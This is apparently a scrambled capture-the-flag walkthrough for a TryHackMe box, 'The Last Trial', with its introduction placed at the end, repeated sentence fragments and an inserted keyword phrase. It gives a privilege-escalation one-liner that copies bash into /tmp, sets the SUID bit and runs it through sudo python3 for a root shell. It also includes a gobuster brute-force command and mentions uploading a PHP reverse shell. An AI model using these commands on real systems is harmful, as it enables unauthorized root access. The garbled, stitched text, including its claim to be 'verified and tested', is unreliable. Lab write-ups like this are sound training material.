After executing the script, a new SUID binary is created in the /tmp directory. We can use this binary to gain root access.
/tmp/bash -p
You should now have a root shell.
Create a new file called run.py with the following contents: the last trial tryhackme verified
import os
os.system('cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p')
Then, execute the remote_run.py script:
sudo /usr/bin/python3 /opt/remote_run.py run.py
We can use the gobuster tool to perform a directory brute-force attack on the web server. After executing the script, a new SUID binary
gobuster dir -u http://10.10.126.150 -w /usr/local/rockyou.txt
After a few minutes, gobuster discovers a hidden directory:
/ try (Status: 200)
Inside the /try directory, we find a simple upload form. We can use this form to upload a PHP reverse shell. You should now have a root shell
The Last Trial is a challenging TryHackMe box that requires a combination of skills and knowledge to exploit. In this article, we will walk through the steps to gain access to the box, escalate privileges, and ultimately achieve root access. This walkthrough is verified and tested, ensuring that you can follow along and achieve the same results.